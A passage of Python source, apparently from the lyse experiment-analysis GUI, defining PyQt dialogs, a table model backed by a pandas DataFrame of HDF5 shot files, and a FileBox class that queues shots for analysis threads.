self.logger.debug('completed analysis of %s'%filepath)
def reorder(self, order):
assert len(order) == len(set(order)), 'ordering contains non-unique elements'
# Apply the reordering to the liststore:
for old_index, new_index in enumerate(order):
name_item = self.model.item(old_index, self.COL_NAME)
name_item.setData(new_index, self.ROLE_SORTINDEX)
self.ui.treeView.sortByColumn(self.COL_NAME, QtCore.Qt.AscendingOrder)
# Apply new order to our list of routines too:
self.routines = [self.routines[order.index(i)] for i in range(len(order))]
def update_select_all_checkstate(self):
with self.select_all_checkbox_state_changed_disconnected:
all_states = []
for row in range(self.model.rowCount()):
active_item = self.model.item(row, self.COL_ACTIVE)
all_states.append(active_item.checkState())
if all(state == QtCore.Qt.Checked for state in all_states):
self.select_all_checkbox.setCheckState(QtCore.Qt.Checked)
elif all(state == QtCore.Qt.Unchecked for state in all_states):
self.select_all_checkbox.setCheckState(QtCore.Qt.Unchecked)
else:
self.select_all_checkbox.setCheckState(QtCore.Qt.PartiallyChecked)
class EditColumnsDialog(QtWidgets.QDialog):
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
close_signal = Signal()
def __init__(self):
QtWidgets.QDialog.__init__(self, None, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint)
def event(self, event):
result = QtWidgets.QDialog.event(self, event)
if event.type() == QtCore.QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
def closeEvent(self, event):
self.close_signal.emit()
event.ignore()
class EditColumns(object):
ROLE_SORT_DATA = QtCore.Qt.UserRole + 1
COL_VISIBLE = 0
COL_NAME = 1
def __init__(self, filebox, column_names, columns_visible):
self.filebox = filebox
self.column_names = column_names.copy()
self.columns_visible = columns_visible.copy()
self.old_columns_visible = columns_visible.copy()
loader = UiLoader()
self.ui = loader.load(os.path.join(LYSE_DIR, 'edit_columns.ui'), EditColumnsDialog())
self.model = UneditableModel()
self.header = HorizontalHeaderViewWithWidgets(self.model)
self.select_all_checkbox = QtWidgets.QCheckBox()
self.select_all_checkbox.setTristate(False)
self.ui.treeView.setHeader(self.header)
self.proxy_model = QtCore.QSortFilterProxyModel()
self.proxy_model.setSourceModel(self.model)
self.proxy_model.setFilterCaseSensitivity(QtCore.Qt.CaseInsensitive)
self.proxy_model.setFilterKeyColumn(self.COL_NAME)
self.ui.treeView.setSortingEnabled(True)
self.header.setStretchLastSection(True)
self.proxy_model.setSortRole(self.ROLE_SORT_DATA)
self.ui.treeView.setModel(self.proxy_model)
self.ui.setWindowModality(QtCore.Qt.ApplicationModal)
self.ui.treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_set_selected_visible = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'Show selected columns', self.ui)
self.action_set_selected_hidden = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'Hide selected columns', self.ui)
self.connect_signals()
self.populate_model(column_names, self.columns_visible)
def connect_signals(self):
if os.name == 'nt':
self.ui.newWindow.connect(set_win_appusermodel)
self.ui.close_signal.connect(self.close)
self.ui.lineEdit_filter.textEdited.connect(self.on_filter_text_edited)
self.ui.pushButton_make_it_so.clicked.connect(self.make_it_so)
self.ui.pushButton_cancel.clicked.connect(self.cancel)
self.model.itemChanged.connect(self.on_model_item_changed)
# A context manager with which we can temporarily disconnect the above connection.
self.model_item_changed_disconnected = DisconnectContextManager(
self.model.itemChanged, self.on_model_item_changed)
self.select_all_checkbox.stateChanged.connect(self.on_select_all_state_changed)
self.select_all_checkbox_state_changed_disconnected = DisconnectContextManager(
self.select_all_checkbox.stateChanged, self.on_select_all_state_changed)
self.ui.treeView.customContextMenuRequested.connect(self.on_treeView_context_menu_requested)
self.action_set_selected_visible.triggered.connect(
lambda: self.on_set_selected_triggered(QtCore.Qt.Checked))
self.action_set_selected_hidden.triggered.connect(
lambda: self.on_set_selected_triggered(QtCore.Qt.Unchecked))
def populate_model(self, column_names, columns_visible):
self.model.clear()
self.model.setHorizontalHeaderLabels(['', 'Name'])
self.header.setWidget(self.COL_VISIBLE, self.select_all_checkbox)
self.ui.treeView.resizeColumnToContents(self.COL_VISIBLE)
# Which indices in self.columns_visible the row numbers correspond to
self.column_indices = {}
# Remove our special columns from the dict of column names by keeping only tuples:
column_names = {i: name for i, name in column_names.items() if isinstance(name, tuple)}
# Sort the column names as comma separated values, converting to lower case:
sortkey = lambda item: ', '.join(item[1]).lower().strip(', ')
for column_index, name in sorted(column_names.items(), key=sortkey):
visible = columns_visible[column_index]
visible_item = QtGui.QStandardItem()
visible_item.setCheckable(True)
if visible:
visible_item.setCheckState(QtCore.Qt.Checked)
visible_item.setData(QtCore.Qt.Checked, self.ROLE_SORT_DATA)
else:
visible_item.setCheckState(QtCore.Qt.Unchecked)
visible_item.setData(QtCore.Qt.Unchecked, self.ROLE_SORT_DATA)
name_as_string = ', '.join(name).strip(', ')
name_item = QtGui.QStandardItem(name_as_string)
name_item.setData(sortkey((column_index, name)), self.ROLE_SORT_DATA)
self.model.appendRow([visible_item, name_item])
self.column_indices[self.model.rowCount() - 1] = column_index
self.ui.treeView.resizeColumnToContents(self.COL_NAME)
self.update_select_all_checkstate()
self.ui.treeView.sortByColumn(self.COL_NAME, QtCore.Qt.AscendingOrder)
def on_treeView_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self.ui)
menu.addAction(self.action_set_selected_visible)
menu.addAction(self.action_set_selected_hidden)
menu.exec_(QtGui.QCursor.pos())
def on_set_selected_triggered(self, visible):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(self.proxy_model.mapToSource(index).row() for index in selected_indexes)
for row in selected_rows:
visible_item = self.model.item(row, self.COL_VISIBLE)
self.update_visible_state(visible_item, visible)
self.update_select_all_checkstate()
self.do_sort()
self.filebox.set_columns_visible(self.columns_visible)
def on_filter_text_edited(self, text):
self.proxy_model.setFilterWildcard(text)
def on_select_all_state_changed(self, state):
with self.select_all_checkbox_state_changed_disconnected:
# Do not allow a switch *to* a partially checked state:
self.select_all_checkbox.setTristate(False)
state = self.select_all_checkbox.checkState()
for row in range(self.model.rowCount()):
visible_item = self.model.item(row, self.COL_VISIBLE)
self.update_visible_state(visible_item, state)
self.do_sort()
self.filebox.set_columns_visible(self.columns_visible)
def update_visible_state(self, item, state):
assert item.column() == self.COL_VISIBLE, "unexpected column"
row = item.row()
with self.model_item_changed_disconnected:
item.setCheckState(state)
item.setData(state, self.ROLE_SORT_DATA)
if state == QtCore.Qt.Checked:
self.columns_visible[self.column_indices[row]] = True
else:
self.columns_visible[self.column_indices[row]] = False
def update_select_all_checkstate(self):
with self.select_all_checkbox_state_changed_disconnected:
all_states = []
for row in range(self.model.rowCount()):
visible_item = self.model.item(row, self.COL_VISIBLE)
all_states.append(visible_item.checkState())
if all(state == QtCore.Qt.Checked for state in all_states):
self.select_all_checkbox.setCheckState(QtCore.Qt.Checked)
elif all(state == QtCore.Qt.Unchecked for state in all_states):
self.select_all_checkbox.setCheckState(QtCore.Qt.Unchecked)
else:
self.select_all_checkbox.setCheckState(QtCore.Qt.PartiallyChecked)
def on_model_item_changed(self, item):
state = item.checkState()
self.update_visible_state(item, state)
self.update_select_all_checkstate()
self.do_sort()
self.filebox.set_columns_visible(self.columns_visible)
def do_sort(self):
header = self.ui.treeView.header()
sort_column = header.sortIndicatorSection()
sort_order = header.sortIndicatorOrder()
self.ui.treeView.sortByColumn(sort_column, sort_order)
def update_columns(self, column_names, columns_visible):
# Index/name mapping may have changed. Get a mapping by *name* of
# which columns were previously visible, so we can update our by-index
# mapping in a moment:
old_columns_visible_by_name = {}
for old_column_number, visible in self.old_columns_visible.items():
column_name = self.column_names[old_column_number]
old_columns_visible_by_name[column_name] = visible
self.columns_visible = columns_visible.copy()
self.column_names = column_names.copy()
# Update the by-index mapping of which columns were visible before editing:
self.old_columns_visible = {}
for index, name in self.column_names.items():
try:
self.old_columns_visible[index] = old_columns_visible_by_name[name]
except KeyError:
# A new column. If editing is cancelled, any new columns
# should be set to visible:
self.old_columns_visible[index] = True
self.populate_model(column_names, self.columns_visible)
def show(self):
self.old_columns_visible = self.columns_visible.copy()
self.ui.show()
def close(self):
self.columns_visible = self.old_columns_visible.copy()
self.filebox.set_columns_visible(self.columns_visible)
self.populate_model(self.column_names, self.columns_visible)
self.ui.hide()
def cancel(self):
self.ui.close()
def make_it_so(self):
self.ui.hide()
class ItemDelegate(QtWidgets.QStyledItemDelegate):
"""An item delegate with a fixed height and a progress bar in one column"""
EXTRA_ROW_HEIGHT = 2
def __init__(self, view, model, col_status, role_status_percent):
self.view = view
self.model = model
self.COL_STATUS = col_status
self.ROLE_STATUS_PERCENT = role_status_percent
QtWidgets.QStyledItemDelegate.__init__(self)
def sizeHint(self, *args):
fontmetrics = QtGui.QFontMetrics(self.view.font())
text_height = fontmetrics.height()
row_height = text_height + self.EXTRA_ROW_HEIGHT
size = QtWidgets.QStyledItemDelegate.sizeHint(self, *args)
return QtCore.QSize(size.width(), row_height)
def paint(self, painter, option, index):
if index.column() == self.COL_STATUS:
status_percent = self.model.data(index, self.ROLE_STATUS_PERCENT)
if status_percent == 100:
# Render as a normal item - this shows whatever icon is set instead of a progress bar.
return QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
else:
# Method of rendering a progress bar into the view copied from
# Qt's 'network-torrent' example:
# http://qt-project.org/doc/qt-4.8/network-torrent-torrentclient-cpp.html
# Set up a QStyleOptionProgressBar to precisely mimic the
# environment of a progress bar.
progress_bar_option = QtWidgets.QStyleOptionProgressBar()
progress_bar_option.state = QtWidgets.QStyle.State_Enabled
progress_bar_option.direction = qapplication.layoutDirection()
progress_bar_option.rect = option.rect
progress_bar_option.fontMetrics = qapplication.fontMetrics()
progress_bar_option.minimum = 0
progress_bar_option.maximum = 100
progress_bar_option.textAlignment = QtCore.Qt.AlignCenter
progress_bar_option.textVisible = True
# Set the progress and text values of the style option.
progress_bar_option.progress = status_percent
progress_bar_option.text = '%d%%' % status_percent
# Draw the progress bar onto the view.
qapplication.style().drawControl(QtWidgets.QStyle.CE_ProgressBar, progress_bar_option, painter)
else:
return QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
class UneditableModel(QtGui.QStandardItemModel):
def flags(self, index):
"""Return flags as normal except that the ItemIsEditable
flag is always False"""
result = QtGui.QStandardItemModel.flags(self, index)
return result & ~QtCore.Qt.ItemIsEditable
class TableView(QtWidgets.QTableView):
leftClicked = Signal(QtCore.QModelIndex)
doubleLeftClicked = Signal(QtCore.QModelIndex)
"""A QTableView that emits a custom signal leftClicked(index) after a left
click on a valid index, and doubleLeftClicked(index) (in addition) on
double click. Multiple inheritance of QObjects is not possible, so we
are forced to duplicate code instead of sharing code with the extremely
similar TreeView class in this module"""
def __init__(self, *args):
QtWidgets.QTableView.__init__(self, *args)
self._pressed_index = None
self._double_click = False
def mousePressEvent(self, event):
result = QtWidgets.QTableView.mousePressEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
return result
def leaveEvent(self, event):
result = QtWidgets.QTableView.leaveEvent(self, event)
self._pressed_index = None
self._double_click = False
return result
def mouseDoubleClickEvent(self, event):
# Ensure our left click event occurs regardless of whether it is the
# second click in a double click or not
result = QtWidgets.QTableView.mouseDoubleClickEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
self._double_click = True
return result
def mouseReleaseEvent(self, event):
result = QtWidgets.QTableView.mouseReleaseEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid() and index == self._pressed_index:
self.leftClicked.emit(index)
if self._double_click:
self.doubleLeftClicked.emit(index)
self._pressed_index = None
self._double_click = False
return result
class DataFrameModel(QtCore.QObject):
COL_STATUS = 0
COL_FILEPATH = 1
ROLE_STATUS_PERCENT = QtCore.Qt.UserRole + 1
ROLE_DELETED_OFF_DISK = QtCore.Qt.UserRole + 2
columns_changed = Signal()
def __init__(self, view, exp_config):
QtCore.QObject.__init__(self)
self._view = view
self.exp_config = exp_config
self._model = UneditableModel()
self.row_number_by_filepath = {}
self._previous_n_digits = 0
self._header = HorizontalHeaderViewWithWidgets(self._model)
self._vertheader = QtWidgets.QHeaderView(QtCore.Qt.Vertical)
self._vertheader.setSectionResizeMode(QtWidgets.QHeaderView.Fixed)
# Smaller font for headers:
font = self._vertheader.font()
font.setPointSize(10 if sys.platform == 'darwin' else 8)
self._header.setFont(font)
font.setFamily('Ubuntu Mono')
self._vertheader.setFont(font)
self._vertheader.setHighlightSections(True)
self._vertheader.setSectionsClickable(True)
self._view.setModel(self._model)
self._view.setHorizontalHeader(self._header)
self._view.setVerticalHeader(self._vertheader)
self._delegate = ItemDelegate(self._view, self._model, self.COL_STATUS, self.ROLE_STATUS_PERCENT)
self._view.setItemDelegate(self._delegate)
self._view.setSelectionBehavior(QtWidgets.QTableView.SelectRows)
self._view.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Check if integer indexing is to be used
try:
self.integer_indexing = self.exp_config.getboolean('lyse', 'integer_indexing')
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
self.integer_indexing = False
# This dataframe will contain all the scalar data
# from the shot files that are currently open:
index = pandas.MultiIndex.from_tuples([('filepath', '')])
self.dataframe = pandas.DataFrame({'filepath': []}, columns=index)
# How many levels the dataframe's multiindex has:
self.nlevels = self.dataframe.columns.nlevels
status_item = QtGui.QStandardItem()
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/information'))
status_item.setToolTip('status/progress of single-shot analysis')
self._model.setHorizontalHeaderItem(self.COL_STATUS, status_item)
filepath_item = QtGui.QStandardItem('filepath')
filepath_item.setToolTip('filepath')
self._model.setHorizontalHeaderItem(self.COL_FILEPATH, filepath_item)
self._view.setColumnWidth(self.COL_STATUS, 70)
self._view.setColumnWidth(self.COL_FILEPATH, 100)
# Column indices to names and vice versa for fast lookup:
self.column_indices = {'__status': self.COL_STATUS, ('filepath', ''): self.COL_FILEPATH}
self.column_names = {self.COL_STATUS: '__status', self.COL_FILEPATH: ('filepath', '')}
self.columns_visible = {self.COL_STATUS: True, self.COL_FILEPATH: True}
# Whether or not a deleted column was visible at the time it was deleted (by name):
self.deleted_columns_visible = {}
# Make the actions for the context menu:
self.action_remove_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/minus'), 'Remove selected shots', self._view)
self.connect_signals()
def connect_signals(self):
self._view.customContextMenuRequested.connect(self.on_view_context_menu_requested)
self.action_remove_selected.triggered.connect(self.on_remove_selection)
def on_remove_selection(self):
self.remove_selection()
def remove_selection(self, confirm=True):
selection_model = self._view.selectionModel()
selected_indexes = selection_model.selectedRows()
selected_name_items = [self._model.itemFromIndex(index) for index in selected_indexes]
if not selected_name_items:
return
if confirm and not question_dialog("Remove %d shots?" % len(selected_name_items)):
return
# Remove from DataFrame first:
self.dataframe = self.dataframe.drop(index.row() for index in selected_indexes)
self.dataframe.index = pandas.Index(range(len(self.dataframe)))
# Delete one at a time from Qt model:
for name_item in selected_name_items:
row = name_item.row()
self._model.removeRow(row)
self.renumber_rows()
def mark_selection_not_done(self):
selected_indexes = self._view.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
for row in selected_rows:
status_item = self._model.item(row, self.COL_STATUS)
if status_item.data(self.ROLE_DELETED_OFF_DISK):
# If the shot was previously not readable on disk, check to
# see if it's readable now. It may have been undeleted or
# perhaps it being unreadable before was due to a network
# glitch or similar.
filepath = self._model.item(row, self.COL_FILEPATH).text()
if not os.path.exists(filepath):
continue
# Shot file is accesible again:
status_item.setData(False, self.ROLE_DELETED_OFF_DISK)
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/tick'))
status_item.setToolTip(None)
status_item.setData(0, self.ROLE_STATUS_PERCENT)
def on_view_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self._view)
menu.addAction(self.action_remove_selected)
menu.exec_(QtGui.QCursor.pos())
def on_double_click(self, index):
filepath_item = self._model.item(index.row(), self.COL_FILEPATH)
shot_filepath = filepath_item.text()
# get path to text editor
viewer_path = self.exp_config.get('programs', 'hdf5_viewer')
viewer_args = self.exp_config.get('programs', 'hdf5_viewer_arguments')
# Get the current labscript file:
if not viewer_path:
error_dialog("No hdf5 viewer specified in the labconfig.")
if '{file}' in viewer_args:
# Split the args on spaces into a list, replacing {file} with the labscript file
viewer_args = [arg if arg != '{file}' else shot_filepath for arg in viewer_args.split()]
else:
# Otherwise if {file} isn't already in there, append it to the other args:
viewer_args = [shot_filepath] + viewer_args.split()
try:
subprocess.Popen([viewer_path] + viewer_args)
except Exception as e:
error_dialog("Unable to launch hdf5 viewer specified in %s. Error was: %s" %
(self.exp_config.config_path, str(e)))
def set_columns_visible(self, columns_visible):
self.columns_visible = columns_visible
for column_index, visible in columns_visible.items():
self._view.setColumnHidden(column_index, not visible)
def update_column_levels(self):
"""Pads the keys and values of our lists of column names so that
they still match those in the dataframe after the number of
levels in its multiindex has increased (the number of levels never
decreases, given the current implementation of concat_with_padding())"""
extra_levels = self.dataframe.columns.nlevels - self.nlevels
if extra_levels > 0:
self.nlevels = self.dataframe.columns.nlevels
column_indices = {}
column_names = {}
for column_name in self.column_indices:
if not isinstance(column_name, tuple):
# It's one of our special columns
new_column_name = column_name
else:
new_column_name = column_name + ('',) * extra_levels
column_index = self.column_indices[column_name]
column_indices[new_column_name] = column_index
column_names[column_index] = new_column_name
self.column_indices = column_indices
self.column_names = column_names
@inmain_decorator()
def mark_as_deleted_off_disk(self, filepath):
# Confirm the shot hasn't been removed from lyse (we are in the main
# thread so there is no race condition in checking first)
if not filepath in self.dataframe['filepath'].values:
# Shot has been removed from FileBox, nothing to do here:
return
row_number = self.row_number_by_filepath[filepath]
status_item = self._model.item(row_number, self.COL_STATUS)
already_marked_as_deleted = status_item.data(self.ROLE_DELETED_OFF_DISK)
if already_marked_as_deleted:
return
# Icon only displays if percent completion is 100. This is also
# important so that the shot is not picked up as analysis
# incomplete and analysis re-attempted on it.
status_item.setData(True, self.ROLE_DELETED_OFF_DISK)
status_item.setData(100, self.ROLE_STATUS_PERCENT)
status_item.setToolTip("Shot has been deleted off disk or is unreadable")
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/drive--minus'))
app.output_box.output('Warning: Shot deleted from disk or no longer readable %s\n' % filepath, red=True)
@inmain_decorator()
def infer_objects(self):
"""Convert columns in the dataframe with dtype 'object' into compatible, more
specific types, if possible. This improves pickling performance and ensures
multishot analysis code does not encounter columns with dtype 'object' for
non-mixed numerical data, which it might choke on.
"""
self.dataframe = self.dataframe.infer_objects()
@inmain_decorator()
def update_row(self, filepath, dataframe_already_updated=False, new_row_data=None, updated_row_data=None):
""""Updates a row in the dataframe and Qt model to the data in the HDF5 file for
that shot."""
# To speed things up block signals to the model during update
self._model.blockSignals(True)
# Update the row in the dataframe first:
if (new_row_data is None) == (updated_row_data is None) and not dataframe_already_updated:
raise ValueError('Exactly one of new_row_data or updated_row_data must be provided')
try:
row_number = self.row_number_by_filepath[filepath]
except KeyError:
# Row has been deleted, nothing to do here:
return
filepath_colname = ('filepath',) + ('',) * (self.nlevels - 1)
assert filepath == self.dataframe.at[row_number, filepath_colname]
if updated_row_data is not None and not dataframe_already_updated:
for group, name in updated_row_data:
column_name = (group, name) + ('',) * (self.nlevels - 2)
value = updated_row_data[group, name]
try:
self.dataframe.at[row_number, column_name] = value
except ValueError:
# did the column not already exist when we tried to set an iterable?
if not column_name in self.dataframe.columns:
# create it with a non-iterable and then overwrite with the iterable value:
self.dataframe.at[row_number, column_name] = None
else:
# Incompatible datatype - convert the datatype of the column to
# 'object'
self.dataframe[column_name] = self.dataframe[column_name].astype('object')
# Now that the column exists and has dtype object, we can set the value:
self.dataframe.at[row_number, column_name] = value
dataframe_already_updated = True
if not dataframe_already_updated:
if new_row_data is None:
raise ValueError("If dataframe_already_updated is False, then new_row_data, as returned "
"by dataframe_utils.get_dataframe_from_shot(filepath) must be provided.")
self.dataframe = replace_with_padding(self.dataframe, new_row_data, row_number)
self.update_column_levels()
# Check and create necessary new columns in the Qt model:
new_column_names = set(self.dataframe.columns) - set(self.column_names.values())
new_columns_start = self._model.columnCount()
self._model.insertColumns(new_columns_start, len(new_column_names))
for i, column_name in enumerate(sorted(new_column_names)):
# Set the header label of the new column:
column_number = new_columns_start + i
self.column_names[column_number] = column_name
self.column_indices[column_name] = column_number
if column_name in self.deleted_columns_visible:
# Restore the former visibility of this column if we've
# seen one with its name before:
visible = self.deleted_columns_visible[column_name]
self.columns_visible[column_number] = visible
self._view.setColumnHidden(column_number, not visible)
else:
# new columns are visible by default:
self.columns_visible[column_number] = True
column_name_as_string = '\n'.join(column_name).strip()
header_item = QtGui.QStandardItem(column_name_as_string)
header_item.setToolTip(column_name_as_string)
self._model.setHorizontalHeaderItem(column_number, header_item)
# Check and remove any no-longer-needed columns in the Qt model:
defunct_column_names = (set(self.column_names.values()) - set(self.dataframe.columns)
- {self.column_names[self.COL_STATUS], self.column_names[self.COL_FILEPATH]})
defunct_column_indices = [self.column_indices[column_name] for column_name in defunct_column_names]
for column_number in sorted(defunct_column_indices, reverse=True):
# Remove columns from the Qt model. In reverse order so that
# removals do not change the position of columns yet to be
# removed.
self._model.removeColumn(column_number)
# Save whether or not the column was visible when it was
# removed (so that if it is re-added the visibility will be retained):
self.deleted_columns_visible[self.column_names[column_number]] = self.columns_visible[column_number]
del self.column_names[column_number]
del self.columns_visible[column_number]
if defunct_column_indices:
# Renumber the keys of self.columns_visible and self.column_names to reflect deletions:
self.column_names = {newindex: name for newindex, (oldindex, name) in enumerate(sorted(self.column_names.items()))}
self.columns_visible = {newindex: visible for newindex, (oldindex, visible) in enumerate(sorted(self.columns_visible.items()))}
# Update the inverse mapping of self.column_names:
self.column_indices = {name: index for index, name in self.column_names.items()}
# Update the data in the Qt model:
dataframe_row = self.dataframe.iloc[row_number].to_dict()
for column_number, column_name in self.column_names.items():
if not isinstance(column_name, tuple):
# One of our special columns, does not correspond to a column in the dataframe:
continue
if updated_row_data is not None:
# Must remove empty strings from tuple to compare with updated_row_data:
if tuple(s for s in column_name if s) not in updated_row_data:
continue
value = dataframe_row[column_name]
if isinstance(value, float):
value_str = scientific_notation(value)
else:
value_str = str(value)
lines = value_str.splitlines()
if len(lines) > 1:
short_value_str = lines[0] + ' ...'
else:
short_value_str = value_str
item = self._model.item(row_number, column_number)
if item is None:
# This is the first time we've written a value to this part of the model:
item = QtGui.QStandardItem(short_value_str)
item.setData(QtCore.Qt.AlignCenter, QtCore.Qt.TextAlignmentRole)
self._model.setItem(row_number, column_number, item)
else:
item.setText(short_value_str)
item.setToolTip(repr(value))
for i, column_name in enumerate(sorted(new_column_names)):
# Resize any new columns to fit contents:
column_number = new_columns_start + i
self._view.resizeColumnToContents(column_number)
if new_column_names or defunct_column_names:
self.columns_changed.emit()
# unblock signals to the model and tell it to update
self._model.blockSignals(False)
self._model.layoutChanged.emit()
@inmain_decorator()
def set_status_percent(self, filepath, status_percent):
try:
row_number = self.row_number_by_filepath[filepath]
except KeyError:
# Row has been deleted, nothing to do here:
return
status_item = self._model.item(row_number, self.COL_STATUS)
status_item.setData(status_percent, self.ROLE_STATUS_PERCENT)
def new_row(self, filepath, done=False):
status_item = QtGui.QStandardItem()
if done:
status_item.setData(100, self.ROLE_STATUS_PERCENT)
status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/tick'))
else:
status_item.setData(0, self.ROLE_STATUS_PERCENT)
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/tick'))
name_item = QtGui.QStandardItem(filepath)
return [status_item, name_item]
def renumber_rows(self, add_from=0):
"""Add/update row indices - the rows are numbered in simple sequential
order for easy comparison with the dataframe. add_from allows you to
only add numbers for new rows from the given index as a performance
optimisation, though if the number of digits changes, all rows will
still be renumbered. add_from should not be used if rows have been
deleted."""
n_digits = len(str(self._model.rowCount()))
if n_digits != self._previous_n_digits:
# All labels must be updated:
add_from = 0
self._previous_n_digits = n_digits
if add_from == 0:
self.row_number_by_filepath = {}
for row_number in range(add_from, self._model.rowCount()):
vertical_header_item = self._model.verticalHeaderItem(row_number)
row_number_str = str(row_number).rjust(n_digits)
vert_header_text = '{}. '.format(row_number_str)
filepath_item = self._model.item(row_number, self.COL_FILEPATH)
filepath = filepath_item.text()
self.row_number_by_filepath[filepath] = row_number
if self.integer_indexing:
header_cols = ['sequence_index', 'run number', 'run repeat']
header_strings = []
for col in header_cols:
val = self.dataframe[col].values[row_number]
if pandas.notna(val):
header_strings.append('{:04d}'.format(val))
else:
header_strings.append('----')
vert_header_text += ' | '.join(header_strings)
else:
basename = os.path.splitext(os.path.basename(filepath))[0]
vert_header_text += basename
vertical_header_item.setText(vert_header_text)
@inmain_decorator()
def add_files(self, filepaths, new_row_data, done=False):
"""Add files to the dataframe model. New_row_data should be a
dataframe containing the new rows."""
to_add = []
# Check for duplicates:
for filepath in filepaths:
if filepath in self.row_number_by_filepath or filepath in to_add:
app.output_box.output('Warning: Ignoring duplicate shot %s\n' % filepath, red=True)
if new_row_data is not None:
df_row_index = np.where(new_row_data['filepath'].values == filepath)
new_row_data = new_row_data.drop(df_row_index[0])
new_row_data.index = pandas.Index(range(len(new_row_data)))
else:
to_add.append(filepath)
assert len(new_row_data) == len(to_add)
if to_add:
# Update the dataframe:
self.dataframe = concat_with_padding(self.dataframe, new_row_data)
self.update_column_levels()
app.filebox.set_add_shots_progress(None, None, "updating filebox")
for filepath in to_add:
# Add the new rows to the Qt model:
self._model.appendRow(self.new_row(filepath, done=done))
vert_header_item = QtGui.QStandardItem('...loading...')
self._model.setVerticalHeaderItem(self._model.rowCount() - 1, vert_header_item)
self._view.resizeRowToContents(self._model.rowCount() - 1)
self.renumber_rows(add_from=self._model.rowCount()-len(to_add))
# Update the Qt model:
for filepath in to_add:
self.update_row(filepath, dataframe_already_updated=True)
@inmain_decorator()
def get_first_incomplete(self):
"""Returns the filepath of the first shot in the model that has not
been analysed"""
for row in range(self._model.rowCount()):
status_item = self._model.item(row, self.COL_STATUS)
if status_item.data(self.ROLE_STATUS_PERCENT) != 100:
filepath_item = self._model.item(row, self.COL_FILEPATH)
return filepath_item.text()
class FileBox(object):
def __init__(self, container, exp_config, to_singleshot, from_singleshot, to_multishot, from_multishot):
self.exp_config = exp_config
self.to_singleshot = to_singleshot
self.to_multishot = to_multishot
self.from_singleshot = from_singleshot
self.from_multishot = from_multishot
self.logger = logging.getLogger('lyse.FileBox')
self.logger.info('starting')
loader = UiLoader()
loader.registerCustomWidget(TableView)
self.ui = loader.load(os.path.join(LYSE_DIR, 'filebox.ui'))
self.ui.progressBar_add_shots.hide()
container.addWidget(self.ui)
self.shots_model = DataFrameModel(self.ui.tableView, self.exp_config)
set_auto_scroll_to_end(self.ui.tableView.verticalScrollBar())
self.edit_columns_dialog = EditColumns(self, self.shots_model.column_names, self.shots_model.columns_visible)
self.last_opened_shots_folder = self.exp_config.get('paths', 'experiment_shot_storage')
self.connect_signals()
self.analysis_paused = False
self.multishot_required = False
# An Event to let the analysis thread know to check for shots that
# need analysing, rather than using a time.sleep:
self.analysis_pending = threading.Event()
# The folder that the 'add shots' dialog will open to:
self.current_folder = self.exp_config.get('paths', 'experiment_shot_storage')
# A queue for storing incoming files from the ZMQ server so
# the server can keep receiving files even if analysis is slow
# or paused:
self.incoming_queue = queue.Queue()
# Start the thread to handle incoming files, and store them in
# a buffer if processing is paused:
self.incoming = threading.Thread(target=self.incoming_buffer_loop)
self.incoming.daemon = True
self.incoming.start()
self.analysis = threading.Thread(target = self.analysis_loop)
self.analysis.daemon = True
self.analysis.start()
def connect_signals(self):
self.ui.pushButton_edit_columns.clicked.connect(self.on_edit_columns_clicked)
self.shots_model.columns_changed.connect(self.on_columns_changed)
self.ui.toolButton_add_shots.clicked.connect(self.on_add_shot_files_clicked)
self.ui.toolButton_remove_shots.clicked.connect(self.shots_model.on_remove_selection)
self.ui.tableView.doubleLeftClicked.connect(self.shots_model.on_double_click)
self.ui.pushButton_analysis_running.toggled.connect(self.on_analysis_running_toggled)
self.ui.pushButton_mark_as_not_done.clicked.connect(self.on_mark_selection_not_done_clicked)
self.ui.pushButton_run_multishot_analysis.clicked.connect(self.on_run_multishot_analysis_clicked)
def on_edit_columns_clicked(self):
self.edit_columns_dialog.show()
def on_columns_changed(self):
column_names = self.shots_model.column_names
columns_visible = self.shots_model.columns_visible
self.edit_columns_dialog.update_columns(column_names, columns_visible)
def on_add_shot_files_clicked(self):
shot_files = QtWidgets.QFileDialog.getOpenFileNames(self.ui,
'Select shot files',
self.last_opened_shots_folder,
"HDF5 files (*.h5)")
if type(shot_files) is tuple:
shot_files, _ = shot_files
if not shot_files:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
shot_files = [os.path.abspath(shot_file) for shot_file in shot_files]
# Save the containing folder for use next time we open the dialog box:
self.last_opened_shots_folder = os.path.dirname(shot_files[0])
# Queue the files to be opened:
for filepath in shot_files:
self.incoming_queue.put(filepath)
def on_analysis_running_toggled(self, pressed):
if pressed:
self.analysis_paused = True
self.ui.pushButton_analysis_running.setIcon(QtGui.QIcon(':qtutils/fugue/control'))
self.ui.pushButton_analysis_running.setText('Analysis paused')
else:
self.analysis_paused = False
self.ui.pushButton_analysis_running.setIcon(QtGui.QIcon(':qtutils/fugue/control'))
self.ui.pushButton_analysis_running.setText('Analysis running')
self.analysis_pending.set()
def on_mark_selection_not_done_clicked(self):
self.shots_model.mark_selection_not_done()
# Let the analysis loop know to look for these shots:
self.analysis_pending.set()
